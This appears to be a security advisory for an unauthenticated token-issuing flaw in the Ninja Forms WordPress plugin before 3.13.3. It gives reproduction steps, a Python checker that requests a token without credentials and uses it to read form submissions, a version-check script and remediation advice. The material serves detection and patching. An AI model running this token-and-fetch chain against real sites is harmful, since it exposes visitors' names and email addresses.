Ninja Forms WordPress Plugin Unauthenticated Access Token Generation Vulnerability

Vulnerability

The Ninja Forms WordPress plugin, in versions prior to 3.13.3, issues access tokens from its REST API without requiring authentication, so an unauthenticated attacker can obtain a valid token. A token obtained this way can then be used to read the submissions stored for a form.

Impact

An attacker who obtains a token can read every submission to the targeted form, including whatever personal data visitors entered (the reproduction below shows names and email addresses). No account on the site is needed, so the exposure applies to any affected site on which the plugin is active.

Reproduction

To reproduce the issue, create a form with the Ninja Forms plugin, note its Form ID, and submit at least one entry to it. Then, with no WordPress session, cookie or nonce, send a POST request to the plugin's REST API token-generation endpoint with the Form ID in the request; on an affected version the response contains a freshly issued access token. Finally, send a GET request to the plugin's submissions endpoint for that form with the token in the Authorization header. The response returns the stored submissions in full, including the names and email addresses entered. Repeating the same unauthenticated token request against 3.13.3 or later is the quickest way to confirm that the fix is in place.
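The two-request flow above, as an added example that is not part of the advisory and is not Ninja Forms code. The page does not name the REST routes, the request field that carries the Form ID, the response field that carries the token, or the Authorization scheme, so every one of those is a parameter or a labelled assumption here (the `placeholder` routes exist only for the constructed fake servers) and must be taken from the plugin source or the vendor advisory before the checker is pointed at a real install you are authorised to test. The HTTP transport is injectable, so the flow can be exercised offline against a constructed unpatched install and a constructed patched one.

```python
"""Added example: the unauthenticated two-request check from the Reproduction
section. Not from the advisory and not Ninja Forms code. Route paths, the
Form ID request field, the token response field and the Authorization scheme
are not given on the page; they are parameters or labelled assumptions."""
import json
import urllib.error
import urllib.request
from typing import Callable, Dict, Optional, Tuple

# Transport signature: (method, url, body, headers) -> (status, raw body)
HttpFn = Callable[[str, str, Optional[bytes], Dict[str, str]], Tuple[int, bytes]]


def urllib_transport(method: str, url: str, body: Optional[bytes],
                     headers: Dict[str, str]) -> Tuple[int, bytes]:
    """Real transport over urllib; non-2xx responses are returned, not raised."""
    req = urllib.request.Request(url, data=body, headers=headers, method=method)
    try:
        with urllib.request.urlopen(req, timeout=10) as resp:
            return resp.status, resp.read()
    except urllib.error.HTTPError as err:
        return err.code, err.read()


def _join(base_url: str, path: str) -> str:
    return base_url.rstrip("/") + "/" + path.lstrip("/")


def request_token(base_url: str, form_id: int, token_path: str,
                  http: HttpFn = urllib_transport,
                  form_id_field: str = "form_id",  # assumed field name
                  token_field: str = "token") -> Optional[str]:  # assumed field name
    """Step 1: POST the Form ID to the token route with no cookie, nonce or
    credentials. Returns the issued token, or None when the server refuses
    or answers with something that is not a token."""
    body = json.dumps({form_id_field: form_id}).encode()
    status, raw = http("POST", _join(base_url, token_path), body,
                       {"Content-Type": "application/json"})
    if status != 200:
        return None
    try:
        data = json.loads(raw)
    except ValueError:
        return None
    token = data.get(token_field) if isinstance(data, dict) else None
    return token if isinstance(token, str) and token else None


def fetch_submissions(base_url: str, submissions_path: str, token: str,
                      http: HttpFn = urllib_transport,
                      auth_scheme: str = "Bearer"):  # scheme assumed
    """Step 2: GET the submissions route with the token in Authorization.
    Returns the decoded body, or None if the route refuses the token."""
    status, raw = http("GET", _join(base_url, submissions_path), None,
                       {"Authorization": f"{auth_scheme} {token}"})
    if status != 200:
        return None
    try:
        return json.loads(raw)
    except ValueError:
        return None


def is_vulnerable(base_url: str, form_id: int, token_path: str,
                  submissions_path: str, http: HttpFn = urllib_transport) -> bool:
    """Vulnerable only if an unauthenticated token is issued AND it unlocks
    submission data; a token the submissions route rejects is not this bug."""
    token = request_token(base_url, form_id, token_path, http)
    if token is None:
        return False
    return fetch_submissions(base_url, submissions_path, token, http) is not None


# Constructed stand-ins so the check runs offline. The route names below are
# placeholders for the fakes only and are NOT the plugin's real routes.
FAKE_TOKEN_PATH = "wp-json/placeholder/token"
FAKE_SUBMISSIONS_PATH = "wp-json/placeholder/submissions"


def fake_vulnerable(method, url, body, headers) -> Tuple[int, bytes]:
    """Pre-3.13.3 behaviour as the advisory describes it: any POST gets a token."""
    if method == "POST" and url.endswith(FAKE_TOKEN_PATH):
        form_id = json.loads(body)["form_id"]
        return 200, json.dumps({"token": f"tok-{form_id}"}).encode()
    if (method == "GET" and url.endswith(FAKE_SUBMISSIONS_PATH)
            and headers.get("Authorization", "").startswith("Bearer tok-")):
        rows = [{"name": "Alice Example", "email": "alice@example.test"}]
        return 200, json.dumps(rows).encode()
    return 403, b'{"code":"rest_forbidden"}'


def fake_patched(method, url, body, headers) -> Tuple[int, bytes]:
    """Fixed behaviour: the unauthenticated token request is refused."""
    if method == "POST" and url.endswith(FAKE_TOKEN_PATH):
        return 401, b'{"code":"rest_not_logged_in"}'
    return 403, b'{"code":"rest_forbidden"}'


if __name__ == "__main__":
    for label, fake in (("unpatched", fake_vulnerable), ("patched", fake_patched)):
        verdict = is_vulnerable("https://example.test", 1,
                                FAKE_TOKEN_PATH, FAKE_SUBMISSIONS_PATH, fake)
        print(f"{label}: {'VULNERABLE' if verdict else 'not vulnerable'}")
```

The verdict deliberately requires both halves of the chain: a token that is issued without credentials but then refused by the submissions route is not the bug this page describes, so `is_vulnerable` only returns True when the token actually unlocks data.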

Remediation

Update the Ninja Forms WordPress plugin to version 3.13.3 or later. Because the affected endpoint needs no credentials, every site running an earlier version with the plugin active is exposed, whether or not it allows visitor registration. After updating, confirm the installed version and verify that the unauthenticated token request from the Reproduction section no longer yields a token that can read submissions.
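A version check for the affected range, as an added example that is not part of the advisory and is not Ninja Forms code. It reads the standard WordPress plugin metadata (`Stable tag:` in a plugin's readme.txt, or the `Version:` header comment in its main PHP file) and compares the result to 3.13.3; the file contents in the samples are constructed, and the plugin slug and main file name used in the demo labels are assumptions not stated on this page.

```python
"""Added example, not from the advisory and not Ninja Forms code: decide
whether an installed version is in the affected range (before 3.13.3).
Parses the standard WordPress plugin metadata formats; the sample texts
are constructed, not copied from the real plugin files."""
import re
from typing import Optional, Tuple

FIXED_IN = "3.13.3"  # from the advisory


def version_key(version: str) -> Tuple[int, ...]:
    """Comparable numeric tuple: '3.13' pads to (3, 13, 0); a suffix such as
    '3.13.2-beta1' compares on its numeric prefix; 'trunk' is rejected."""
    m = re.match(r"\s*v?(\d+(?:\.\d+)*)", version)
    if not m:
        raise ValueError(f"unrecognised version string: {version!r}")
    parts = [int(p) for p in m.group(1).split(".")]
    return tuple(parts + [0] * (3 - len(parts)))


def is_affected(version: str) -> bool:
    """True for every version the advisory lists as affected."""
    return version_key(version) < version_key(FIXED_IN)


def version_from_metadata(text: str) -> Optional[str]:
    """Extract the version from readme.txt ('Stable tag: 3.13.2') or from the
    plugin header comment ('Version: 3.13.2'). 'Stable tag: trunk' carries
    no number, so it yields None and the caller should fall back to the header."""
    m = re.search(r"^\s*\*?\s*(?:Stable tag|Version):\s*(\S+)", text, re.M | re.I)
    if not m or m.group(1).lower() == "trunk":
        return None
    return m.group(1)


# Constructed samples in the two metadata formats (not real plugin files).
SAMPLE_README = "=== Ninja Forms ===\nStable tag: 3.13.2\n"
SAMPLE_HEADER = "<?php\n/*\n * Plugin Name: Ninja Forms\n * Version: 3.13.3\n */\n"

if __name__ == "__main__":
    # File names are the usual WordPress layout for a plugin with slug
    # 'ninja-forms'; that slug is an assumption, not stated on this page.
    for name, text in (("readme.txt", SAMPLE_README), ("ninja-forms.php", SAMPLE_HEADER)):
        v = version_from_metadata(text)
        print(f"{name}: {v} -> {'AFFECTED' if v and is_affected(v) else 'fixed'}")
```

Prefer the main plugin file's `Version:` header over the readme when both are available: readme.txt can lag behind the shipped code or read `trunk`, while the header is what WordPress itself reports as the installed version.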

Added: Jan 2, 2026, 6:20 AM
Updated: Jan 2, 2026, 6:20 AM

Vulnerability Rating

Custom Algorithm
spread: 7.6
impact: 2.5
exploitability: 9.7
remediation: 7.7
relevance: 1.8
threat: 6.4
urgency: 2.9
incentive: 10.0

Our algorithm analyzes dozens of metrics to generate these 8 key vulnerability categories, which are then combined to calculate the overall risk score.